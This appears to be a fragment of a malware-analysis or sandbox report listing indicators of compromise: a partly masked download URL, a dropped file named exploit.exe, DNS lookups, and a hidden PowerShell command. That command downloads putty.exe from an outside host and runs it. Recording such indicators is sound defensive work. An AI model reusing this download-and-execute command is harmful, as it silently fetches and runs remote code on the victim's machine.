Technical Information
- http://di##.#arelia.pro/ycnz1yj/putty.exe as %temp%\exploit.exe
- %TEMP%\exploit.exe
- http://di##.#arelia.pro/yCnZ1yJ/putty.exe
- DNS ASK di##.#arelia.pro
- DNS ASK ha###bin.com
- '%TEMP%\exploit.exe'
- '<SYSTEM32>\cmd.exe' /c PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://di##.#arelia.pro/yCnZ1yJ/putty.exe','%temp%\exploit.exe');Start-Process '%temp%\exploit.exe'